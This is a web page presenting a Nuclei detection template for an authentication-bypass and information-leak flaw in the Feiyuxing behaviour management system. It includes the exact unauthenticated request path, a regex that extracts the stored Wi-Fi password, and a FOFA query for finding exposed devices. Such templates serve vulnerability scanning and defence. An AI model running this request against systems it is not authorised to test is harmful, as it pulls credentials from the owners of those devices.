Skip to content

Feiyuxing Information - Exposure

ID: feiyuxing-info-leak

Severity: high

Author: SleepingBag945

Tags: misconfig,exposure,iot,wpa,wpa2

Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords

id: feiyuxing-info-leak
info:
name: Feiyuxing Information - Exposure
author: SleepingBag945
severity: high
description: |
Feiyuxing enterprise-level intelligent online behavior management system has authority bypass and information leakage vulnerabilities, which can obtain administrator rights and user passwords
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E9%A3%9E%E9%B1%BC%E6%98%9F/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
classification:
cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: feiyuxing
product: vec40g_firmware
fofa-query: title="飞鱼星企业级智能上网行为管理系统"
tags: misconfig,exposure,iot,wpa,wpa2
http:
- method: GET
path:
- "{{BaseURL}}/request_para.cgi?parameter=wifi_get_5g_host"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body,"WPA2-PSK") || contains(body,"WPA-PSK")'
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- "\"wl_passwd_5g\":\"(.*?)\""
# digest: 4b0a0048304602210083c0f2caf7149ec69158109f388cb37cfe3d65dabb2fff6b78d4082d59bba5e4022100e4618547614703b8993fe7b6994af0bc51200945c0da603872b3707723ecbd8e:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/misconfiguration/feiyuxing-info-leak.yaml"

View on Github